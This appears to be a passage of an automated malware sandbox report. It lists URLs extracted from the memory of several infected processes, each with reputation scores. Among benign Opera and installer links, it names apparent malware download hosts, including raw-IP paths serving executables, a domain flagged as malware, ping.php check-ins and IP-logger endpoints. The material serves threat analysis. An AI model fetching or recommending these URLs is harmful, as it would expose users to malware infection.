https://iplogger.org/privacy/ | InstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003402000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003685000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000376B000.00000004.00000800.00020000.00000000.sdmp | false | -
                                                      high
                                                      http://www.innosetup.com/JgqIdYSSt70LQLRUqfTzKJw8.tmp, JgqIdYSSt70LQLRUqfTzKJw8.tmp, 0000000F.00000000.2368008485.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000003.2649313565.0000000001FE8000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2680202332.0000000002088000.00000004.00001000.00020000.00000000.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000003.2679800930.00000000022B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://download.opera.com/=xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://crashpad.chromium.org/7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                          high
                                                          https://addons.opera.com/en/extensions/details/dify-cashback/XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                            high
                                                            https://autoupdate.geo.opera.com/geolocation/7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000857000.00000004.00000020.00020000.00000000.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                              high
                                                              http://185.172.128.90/=3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://crashstats-collector.opera.com/collector/submit7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3370357777.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391913141.0000000050E5C000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391378343.0000000050E24000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391349315.0000000050E14000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000003.2965488814.0000000054A38000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                                high
                                                                http://yip.suInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://galandskiyher5.com/downloads/toolspub1.exe4kLInstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003815000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036F8000.00000004.00000800.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000000.2363308446.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000002.3339996391.0000000000401000.00000020.00000001.01000000.0000001B.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000000.2672587380.0000000000401000.00000020.00000001.01000000.0000001F.sdmpfalse
                                                                    high
                                                                    http://185.172.128.126/InstallSetup7.exe4kLInstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://185.172.128.145/15f649199f40275b/vcruntime140.dlltablesyncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://crl.ver)svchost.exe, 00000002.00000002.3430656539.000002191A400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      low
                                                                      https://net.geo.operInstallUtil.exe, 00000004.00000002.3412274842.00000000038CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://opera.com/privacy7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                                        high
                                                                        https://www.ecosia.org/newtab/syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://gamemaker.io)7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exeInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000346F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003295000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003482000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • 0%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://https://_bad_pdb_file.pdbN82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          http://185.172.128.187/3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • 15%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://15.204.49.148InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000360A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • 18%, Virustotal, Browse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://nsis.sf.net/NSIS_Error3cs4PKncIzTPVTZHP3GDsO8B.exe, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000000.2546813100.000000000040B000.00000002.00000001.01000000.00000011.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000000.2603377922.000000000040B000.00000002.00000001.01000000.00000018.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3358148419.000000000040B000.00000002.00000001.01000000.0000001C.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000000.2672813339.000000000040B000.00000002.00000001.01000000.00000020.sdmpfalse
                                                                            high
                                                                            http://net.geo.opera.comInstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000360A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.google.com/feedfetcher.html)HKLMN82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpfalse
                                                                                high
                                                                                https://blockchain.infoindexN82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://gamemaker.io/en/get.7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpfalse
                                                                                • 0%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://namecloudvideo.orgInstallUtil.exe, 00000004.00000002.3412274842.00000000037DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 2%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://gamemaker.io7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmpfalse
                                                                                • 0%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://185.172.128.187/ping.php?substr=seven3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614606913.0000000003080000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3386681499.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3394349460.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3395247637.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3390868030.000000000098E000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3392643713.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3389719090.000000000081E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • 17%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://download3.operacdn.com/57odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://pastebin.comInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://desktop-netinstaller-sub.osp.opera.software/v1/binary#=7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • 1%, Virustotal, Browse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://redir.opera.com/www.opera.com/firstrun/?utm_campaign=767&utm_medium=apb&utm_source=mkt&http_xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3389482183.0000000054A40000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390871165.0000000054B34000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390454774.0000000054AE0000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://download3.operacdn.com/ftp/pub/opera/desktop/108.0.5067.24/win/Opera_108.0.5067.24_AutoupdatXgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://185.172.128.145/15f649199f40275b/freebl3.dllyqsyncUpd.exe, 00000016.00000002.3389892346.00000000009D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 4%, Virustotal, Browse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003815000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036F8000.00000004.00000800.00020000.00000000.sdmp, JgqIdYSSt70LQLRUqfTzKJw8.exe, 0000000E.00000000.2363308446.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, FNi4gQqkHn29EqnTv0rxfxe1.exe, 0000001D.00000002.3339996391.0000000000401000.00000020.00000001.01000000.0000001B.sdmp, jUzz7ezNBFbkGCxJO9DOH9dj.exe, 00000021.00000000.2672587380.0000000000401000.00000020.00000001.01000000.0000001F.sdmpfalse
                                                                                          high
                                                                                          https://crashpad.chromium.org/bug/new7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmpfalse
                                                                                            high
                                                                                            http://185.172.128.145/15f649199f40275b/syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmpfalse
                                                                                            • 2%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://desktop-netinstaller-sub.osp.opera.software/ry7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • 0%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://iplogger.org/InstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003402000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003685000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000376B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://download.opera.com/download/get/?id=65199&autoupdate=1&ni=1&stream=stable&utm_campaign=767&uxzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-repInstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://185.172.128.145/15f649199f40275b/freebl3.dlliqsyncUpd.exe, 00000016.00000002.3389892346.00000000009D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://download3.operacdn.com/v=7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://autoupdate.geo.opera.com/J5xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000828000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://185.172.128.187/ping.php?substr=sevenminuser-l1-1-03cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://yip.suInstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://15.204.498:InstallUtil.exe, 00000004.00000002.3412274842.00000000038DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        low
                                                                                                        https://crashstats-collector.opera.com/collector/submitP7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391875996.0000000050E54000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391913141.0000000050E5C000.00000004.00001000.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3391378343.0000000050E24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
